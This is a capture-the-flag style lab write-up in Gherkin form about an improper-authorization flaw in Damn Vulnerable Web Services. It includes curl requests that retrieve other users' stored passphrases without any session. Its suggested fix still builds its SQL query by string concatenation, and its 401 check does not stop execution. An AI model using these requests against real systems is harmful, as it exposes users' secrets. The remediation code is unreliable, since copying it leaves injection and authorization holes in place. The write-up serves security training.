## Version 1.4.1
## language: en

Feature:
  TOE:
    Damn Vulnerable Web Services - dvws
  Category:
    Improper Authorization
  Location:
    http://dvws/passphrasegen.html
  CWE:
    CWE-285: https://cwe.mitre.org/data/definitions/285.html
    CWE-284: https://cwe.mitre.org/data/definitions/284.html
  Rule:
    REQ.096: https://fluidattacks.com/web/rules/096/
  Goal:
    Access sensitive information as an unauthorized user
  Recommendation:
    Verify the incoming requests are from authorized users

  Background:
  Hacker's software:
    | <Software name> | <Version>   |
    | Windows10       | 2004        |
    | Chromium        | 85.0        |
    | Virtualbox      | 6.1         |
    | Vagrant         | 2.2.10      |
    | Ubuntu          | 20.04       |
    | Docker          | 19.03       |
  TOE Information:
    Given I am accessing the followin url "http://dvws/"
    And DVWS is running within a docker container
    And is built with nodejs, angular and mongodb

  Scenario: Normal use case
    Given I access "http://dvws/"
    And login with the following credentials
    """
    Username: admin
    Password: admin
    """
    Then I can see a form to create and store passphrases
    And I proceed to create a new passphrase
    And I add a name to it and generate a passphrase with the "generate" button
    """
    SuperSecretPassword
    74537c7c816b52726772483c6b476969
    """
    And I save the passphrase
    Then I reload the page
    And I can see my passphrase in the bottom of the page

  Scenario: Static detection
    When I look at the code in "./routes/passphrase.js"
    Then I can see the route "/v2/passphrase/:username"
    And I see this route calls "get()" from "./controllers/passphrase.js"
    Then I inspect the code at "./controllers/passphrase.js"
    And I find the function "get()"
    And I see the function is not validating users before display all passwords
    Then I see It's being cause by ./routes/passphrase.js from line 13 to 15
    """
    router.route('/v2/passphrase/:username')
        .get(controller.get)
    };
    """
    And by ./controllers/passphrase.js from line 47 to 50
    """
    get: (req, res) => {
      res = set_cors(req, res)
      res.set('Cache-Control', 'no-store, no-cache, must-revalidate, private');
        sql.query("select passphrase,reminder from passphrases WHERE username =
         '" + req.params.username + "'", function (err, result) {
    ...
    """
    And I can conclude that no authentication and authorization is done
    And I can access this resource as a different user
    And I can access this resource as an unauthenticated user

  Scenario: Dynamic detection
    Given I access the following page "http://dvws/passphrasegen.html"
    And no login is required
    Then I can conclude the app is not doing consistent authorization
    And is neither doing consistent authentication

  Scenario: Exploitation
    Given I'm in the linux terminal
    And I make a request to "/api/v2/passphrase/admin" with curl
    """
    curl -X GET -v http://dvws/api/v2/passphrase/admin
    """
    Then I get all passwords created from an user admin
    """
    [{"passphrase":"766d4e597d693a4a594a75383958604b",
      "reminder":"SuperSecretPassword"}]
    """
    Then I login again into the app at  "http://dvws/"
    And I open the chrome dev tools
    Then I open the next page "http://dvws/passphrasegen.html"
    And from the chrom dev tools I inspect the "Network" tab
    And I search for a XHR request with the path "/v2/passphrase/admin"
    Then I copy the request "as cURL (bash)"
    And I paste it into the terminal
    And change the "http://dvws/api/v2/passphrase/admin" path
    """
    curl 'http://dvws/api/v2/passphrase/User01' \
    -H 'Connection: keep-alive' \
    -H 'Accept: application/json, text/plain, */*' \
    -H 'DNT: 1' \
    -H 'Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjo\
      iYWRtaW4iLCJwZXJtaXNzaW9ucyI6WyJ1c2VyOnJlYWQiLCJ1c2VyOndyaXRlIl0sImlhd\
      CI6MTYwMDIxNDExNiwiZXhwIjoxNjAwMzg2OTE2LCJpc3MiOiJodHRwczovL2dpdGh1Yi5\
      jb20vc25vb3B5c2VjdXJpdHkifQ.BCNXJdmmtN__CdQTuQHaCl7mdrAFfO5vgO2P1dcHg3g'\
    -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)\
        Chrome/85.0.4183.102 Safari/537.36' \
    -H 'Referer: http://dvws/passphrasegen.html' \
    -H 'Accept-Language: en-US,en;q=0.9' \
    --compressed \
    --insecure
    """
    And I get all passwords created from an user User01
    """
    [{"passphrase":"45317248754e7a5b3a71695c6b7b804d",
      "reminder":"BankAccountPassword"}]
    """
    And I can conclude I can access all passphrases from any user
    And I don't need any session, token or cookie

  Scenario: Remediation
    Given the service isn't authenticating an user to access the given resource
    """
    http://dvws/api/v2/passphrase/admin
    """
    Then I edit the route "/v2/passphrase/:username" in "routes/passphrase.js"
    And Include a authentication check before accessing the given resource
    """
    router.route('/v2/passphrase/:username')
      .get(validateToken, controller.get)
    """
    And only an authenticated user can access the given resource
    Then I edit the function "get()" in "./controllers/passphrase.js"
    And Include an authorization check before querying the data from the DB
    """
    get: (req, res) => {
      res = set_cors(req, res)
      res.set('Cache-Control', 'no-store, no-cache, must-revalidate, private');
      console.log(req.decoded);
      // This section was modified by me.
      // Begin.
      if(req.decoded.user != req.params.username) {
        result = {
            error: `Authorization error. Insufficiente permission to
                    access this resource`,
            status: 401
          };
          res.status(401).send(result);
      }
      // End.
        sql.query("select passphrase,reminder from passphrases WHERE
        username = '" + req.params.username + "'", function (err, result) {
    """
    Then a user can only access his own passphrases
    And an unauthenticated user can't access the resource either

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    7.4/10 (High) - AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N/
  Temporal: Attributes that measure the exploit's popularity and fixability
    7.2/10 (High) - E:H/RL:W/RC:C/
  Environmental: Unique and relevant attributes to a specific user environment
    9.3/10 (High) - CR:H/IR:L

  Scenario: Correlations
    No correlations have been found to this date {2020-09-15}
